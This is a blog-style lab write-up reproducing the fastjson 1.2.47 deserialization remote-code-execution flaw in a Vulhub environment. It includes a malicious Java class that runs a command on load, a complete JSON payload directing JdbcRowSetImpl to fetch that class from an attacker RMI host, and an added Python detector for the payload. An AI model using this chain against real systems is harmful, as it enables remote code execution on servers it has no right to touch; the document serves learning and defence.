Reproducing the fastjson <= 1.2.47 deserialization vulnerability

0x00: Introduction

I had originally planned to pick a time to reproduce this vulnerability after it was disclosed. Later a friend suddenly sent me a site that had this fastjson vulnerability, and a white hat had already filed a report on it. Since a vulnerable environment was right at my fingertips, I intended to just start directly. In my imagination it would of course be a one-shot kill (fog); in reality things are never that simple. I suspect they had quietly fixed this vulnerability, because I did not even receive a response at the RMI server.... So my environment is reproduced from the vulhub master branch.

0x01: Preparing the Environment

Download the fastjson vulnerability environment directory from Vulhub on GitHub and run

    docker-compose up -d

to start the environment.

Then start an RMI or LDAP service on your own VPS.

marshalsec is recommended for quickly starting an RMI or LDAP service.

Address:

https://github.com/mbechler/marshalsec

Download marshalsec and build the jar package with Maven:

    mvn clean package -DskipTests

Then start the RMI or LDAP service:

    java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]


TouchFile is the malicious class I compiled. The compiled TouchFile.class is placed in the tomcat webapps/ROOT directory. The Java source code is as follows:

    import java.lang.Runtime;
    import java.lang.Process;

    public class TouchFile {
        // The static initializer runs as soon as the class is loaded,
        // so the command executes on class load without any method call.
        static {
            try {
                Runtime rt = Runtime.getRuntime();
                String[] commands = {"touch", "/tmp/success"};
                Process pc = rt.exec(commands);
                pc.waitFor();
            } catch (Exception e) {
                // do nothing
            }
        }
    }

Start tomcat and confirm that http://ip:8080/TouchFile.class can be visited.

Why confirm this? Because at first my class file in the webapps directory was not reproduced successfully. Then I looked at the tomcat access log and found that RMI really had sent a request to fetch my malicious class, but it was a 404... I once doubted my whole life...

0x02: Attack

Send the request directly to the vulnerable environment built above, on port 8090, with the method changed to POST.

Payload:

    {
        "a":{
            "@type":"java.lang.Class",
            "val":"com.sun.rowset.JdbcRowSetImpl"
        },
        "b":{
            "@type":"com.sun.rowset.JdbcRowSetImpl",
            "dataSourceName":"rmi://ip:8088/TouchFile",
            "autoCommit":true
        }
    }

After the request is sent, the RMI server receives a request and the malicious class TouchFile.class is loaded remotely.

You can see that touch /tmp/success was executed successfully.

A reverse shell works the same way.
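The request body above has two recognisable halves: a `java.lang.Class` entry whose `val` pre-loads a JNDI-capable class into the autoType cache, and a second entry that instantiates that class with an `rmi://` or `ldap://` `dataSourceName`. The following detection script is an added example, not part of the original post or of the fastjson project; it walks a JSON body looking for exactly those two halves, and the request bodies it checks are constructed samples (the host `attacker.example` is a placeholder). Because fastjson parses more leniently than Python's `json` module, an unparseable body that still contains an `@type` key is reported rather than silently skipped.

```python
import json
import re
from typing import Any, List

# Sink class used by the chain in this post. Kept as an explicit, small set so
# the rule stays auditable; extend it as other JNDI-capable beans are confirmed.
JNDI_SINK_CLASSES = {"com.sun.rowset.JdbcRowSetImpl"}
JNDI_SCHEMES = ("rmi://", "ldap://", "ldaps://")


def _walk(node: Any, path: str, findings: List[str]) -> None:
    """Recursively inspect a parsed JSON tree for the two halves of the chain."""
    if isinstance(node, dict):
        atype = node.get("@type")
        # Half 1: java.lang.Class with a val naming a sink class (cache poisoning).
        if atype == "java.lang.Class" and node.get("val") in JNDI_SINK_CLASSES:
            findings.append(f"{path}: java.lang.Class pre-loads {node['val']} (autoType cache poisoning)")
        # Half 2: the sink class itself, ideally with a JNDI dataSourceName.
        if atype in JNDI_SINK_CLASSES:
            dsn = str(node.get("dataSourceName", ""))
            if dsn.lower().startswith(JNDI_SCHEMES):
                findings.append(f"{path}: {atype} with JNDI dataSourceName {dsn}")
            else:
                findings.append(f"{path}: {atype} instantiated via @type")
        for key, value in node.items():
            _walk(value, f"{path}.{key}", findings)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            _walk(value, f"{path}[{i}]", findings)


def scan_body(body: str) -> List[str]:
    """Return a list of findings for one request body; an empty list means clean."""
    findings: List[str] = []
    try:
        _walk(json.loads(body), "$", findings)
    except ValueError:
        # fastjson accepts input json.loads rejects; do not let a parse failure
        # hide an @type key, which is the common element of every autoType chain.
        if re.search(r'"@type"\s*:', body):
            findings.append("$: unparseable body containing @type key")
    return findings


def is_suspicious(body: str) -> bool:
    return bool(scan_body(body))


# Constructed sample bodies (not captured traffic).
ATTACK_BODY = """{
    "a": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"},
    "b": {"@type": "com.sun.rowset.JdbcRowSetImpl",
          "dataSourceName": "rmi://attacker.example:8088/TouchFile",
          "autoCommit": true}
}"""
BENIGN_BODY = '{"user": "alice", "items": [{"id": 1, "qty": 2}]}'

if __name__ == "__main__":
    for label, body in (("attack", ATTACK_BODY), ("benign", BENIGN_BODY)):
        print(label, "->", scan_body(body) or "clean")
```

The rule reports each half separately so that a body carrying only the `java.lang.Class` pre-load (for instance a probe sent before the real request) is still visible in logs; in a WAF or reverse proxy the cheap textual `@type` check can run first and the full walk only on bodies that contain it.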


0x03: Some pitfalls

Because my previous server had expired and I had not bought a new one, this VPS was freshly purchased, and I forgot to configure the Alibaba Cloud firewall, which was very embarrassing... The RMI server never received a request and I was very confused, until a friend asked me whether I had configured my firewall yet....

Then there was the problem of the malicious class path (my Java is too weak; this is not a pitfall, it is just me being too green).

Finally, both the RMI and LDAP approaches require this version or lower; they are fixed in later versions.


Origin www.cnblogs.com/escape-w/p/11322845.html